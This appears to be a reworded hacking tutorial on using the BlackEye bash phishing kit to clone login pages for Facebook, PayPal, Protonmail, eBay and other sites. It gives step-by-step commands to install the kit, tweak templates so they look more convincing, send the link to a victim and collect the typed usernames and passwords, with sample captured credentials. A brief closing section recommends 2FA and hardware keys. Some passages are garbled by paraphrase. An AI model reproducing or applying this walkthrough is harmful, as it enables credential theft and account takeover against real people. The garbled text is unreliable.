Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on sites such as Facebook, Instagram and Twitter are often based on phishing. These password-stealing attacks rely on deceiving users to enter their passwords on a convincingly fake website, and they have become increasingly easy to do thanks to tools like BlackEye.
BlackEye is a tool for quickly generating phishing pages that target social media sites, making it much easier to phish targets of opportunities in the same network. After redirecting a target to the phishing site, it is easy to capture passwords for social media accounts that are harvested from unintentional targets.
Users rely heavily on their social media accounts. If the target does not have 2FA enabled, it may be surprising that an attacker can access them. Simply typing a password on the wrong website can be all it takes to lose access to your account. BlackEye is a concept that demonstrates how these phishing sites do not need to be sophisticated or customized to work effectively.
BlackEye is a simple bash script that presents several templates to choose from, allowing you to choose which social media site to emulate. From there, it creates a functional phishing site on your device with the ability to forward or otherwise connect to your target's machine.
BlackEye supports 32 different phishing templates, but these vary in quality. It is best to test them before they are distributed because some suffer from deficiencies that can give them away if a user notices. While the regular phishing pages that come with BlackEye are quite good, they are always useful to change them. This way you can remove things like a copyright notice from the wrong year.
Among the more interesting sites that BlackEye supports are Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal and Google. You can test these quickly by following the steps below and clicking on the phishing URL to find out how realistic each template looks before using it.
BlackEye is an extremely simple tool but works best on Kali Linux. It depends on the number of dependencies it relies on to run, but these can be installed as needed on Ubuntu or Debian devices. Once you have a Kali distro fully updated, you should be ready to install BlackEye.
Step 1: Download and test BlackEye
First, we must clone the source from BlackEye's GitHub archive. To do so, open a new terminal window and type the following commands git and cd .
~ $ git clone https://github.com/thelinuxchoice/blackeye Cloning to "blackeye" ... remote control: List items: 361, done. remote control: Total 361 (delta 0), reused 0 (delta 0), reused 361 Receiving Items: 100% (361/361), 8.01 MiB | 3.17 MiB / s, clear. Loose deltas: 100% (101/101), done. ~ $ cd blackeye ~ / blackeye $
It should install the BlackEye archive and allow it to run from the blackeye directory with the command bash blackeye.sh . When we run the command we should see the splash screen below.
~ / blackeye $ bash blackeye.sh :: Disclaimer: Developers take no responsibility and are not :: :: responsible for any abuse or damage caused by BlackEye. :: :: Use only for educational purposes !! :: :: Attacking targets without mutual consent is illegal! ::  Instagram  IGFollowers  Custom BLACKEYE v1.1  Facebook  eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒  Snapchat  Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒  Twitter  CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒  Github  Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒  Google  DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒  Spotify  Adobe ID ▐┼▐▒▒██████████████▒▒▒  Netflix  Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒  PayPal  Messenger ▒▒█████──────────▐███▌  Origin  GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒  Steam  Twitch ▒▒█▒▒███████▄██████▒▒▒  Yahoo  MySpace ▒▒▒▒▒██████████████▒▒▒  Linkedin  Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒  Protonmail  UK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒  WordPress  Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒  Microsoft  devianART CODED BY: @thelinuxchoice Upgraded by: @suljot_gjoka
Step 2: Adjust phishing sites
If we don't like something like an expired copyright notice, we can change it quite easily. First, exit the base script back to the blackeye directory. Then we write ls to see the pages folder in BlackEye repo.
~ / blackeye $ ls blackeye.sh LICENSE README.md Sites
We can navigate to it with the command cd sites . Then type ls to see all the phishing site templates available to modify.
~ / blackeye $ CD sites ~ / blackeye / sites $ ls Adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
To edit Protonmail we can write cd protonmail and then ls again to see the files in that folder. You should see something similar to the files below.
~ / blackeye / sites $ cd protonmail ~ / blackeye / sites / protonmail $ ls index_files index.php ip.php ip.txt login.html login.php Saved.ip.txt Saved.usernames.txt
To edit HTML on the phishing page, you can do so directly by opening the login . html with a text editor, so you can easily update copyright notices or other details.
To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then run the command bash blackeye.sh to return to the phishing selection menu. Here we choose eBay, which is number 18.
~ / blackeye / sites / protonmail $ cd ~ $ cd blackeye ~ / blackeye $ bash blackeye.sh  Instagram  IGFollowers  Custom BLACKEYE v1.1  Facebook  eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒  Snapchat  Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒  Twitter  CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒  Github  Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒  Google  DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒  Spotify  Adobe ID ▐┼▐▒▒██████████████▒▒▒  Netflix  Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒  PayPal  Messenger ▒▒█████──────────▐███▌  Origin  GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒  Steam  Twitch ▒▒█▒▒███████▄██████▒▒▒  Yahoo  MySpace ▒▒▒▒▒██████████████▒▒▒  Linkedin  Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒  Protonmail  UK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒  WordPress  Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒  Microsoft  devianART CODED BY: @thelinuxchoice Upgraded by: @suljot_gjoka [*] Select an option: 18
When you have entered the number of the site you want to create, press enter . We will then be asked to enter our IP address. If you hit enter without adding one, it will try to add yours by default, but it won't always work. Once you enter your IP address, you should see something like the message below.
[*] Set your local IP (default 10.0.6.27): [*] Starting php server ... [*] Send this link to the victim: 192.168.0.16 [*] Waiting victims open the link ...
Then navigate to the phishing link in a web browser to see the results of your phishing site.
When you open the site in a browser, it should look like this:
Open the link to get the script to report on the type of devices currently accessing the phishing page.
[*] Waiting victims open the link ... [*] IP Found! [*] IP Offer: 192.168.43.142 [*] User Agent: User Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 60.0) Gecko / 20100101 Firefox / 60.0 [*] Saved: shopping / sparad.ip.txt
Once the target has set their credentials, they are redirected to the real eBay page, creating the illusion of a successful login.
On the hacker's side, BlackEye gives us the references that our target has just set.
[*] Waiting for data ... [*] Information found! [*] Account: fudruckers [*] Password: thefudruckerking69 [*] Saved: websites / shopping / Saved.usernames.txt
Just as we have eavesdropped and saved references as a target stated on our phishing page!
Phishing Social Media Sites Is Fast & Easy  When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can cause your password to be stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram and any other accounts you have.
Another step toward improving security is to use a hardware security key to require new devices to use your key to log in, make stolen passwords and even eavesdropped text messages worthless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you do not have permission to access.
I hope you liked this social media password guide! If you have any questions about this tutorial on phishing tools on social media, please ask below, and if you have a comment or idea for a future section, feel free to reach me on Twitter @KodyKinzie .
Don't miss: Stealing Wi-Fi password with an evil twin attack
Don't miss: Stealing Wi-Fi password with an evil twin attack
Learn how to code with Null Byte's beginner's Python course.
Buy now for $ 99.99>